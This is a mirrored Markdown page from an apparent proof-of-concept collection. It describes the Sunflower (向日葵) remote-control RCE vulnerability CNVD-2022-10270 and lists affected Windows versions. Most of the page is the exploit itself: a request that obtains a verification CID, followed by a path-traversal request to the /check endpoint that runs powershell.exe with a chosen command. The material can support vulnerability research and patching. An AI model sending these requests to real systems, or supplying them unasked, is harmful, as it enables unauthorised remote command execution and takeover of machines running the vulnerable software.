mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 03:46:17 +00:00
34 lines
1.2 KiB
Markdown
34 lines
1.2 KiB
Markdown
|
|
# 向日葵远程代码执行漏洞(CNVD-2022-10270)
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取。
|
|||
|
|
|
|||
|
|
## 影响版本
|
|||
|
|
+ 向日葵个人版 for Windows <=11.0.0.33162版本
|
|||
|
|
+ 向日葵简约版 <= V1.0.1.43315(2021.12)
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
向日葵开启后会默认在`4000-65535`之间开启某个端口
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
发送请求获取CID
|
|||
|
|
|
|||
|
|
```java
|
|||
|
|
/cgi-bin/rpc?action=verify-haras
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
使用获取到的 verify_string 作为 cookie的 CID字段,进行命令执行
|
|||
|
|
|
|||
|
|
```java
|
|||
|
|
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:58:31
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/re22tknn48ckod6v>
|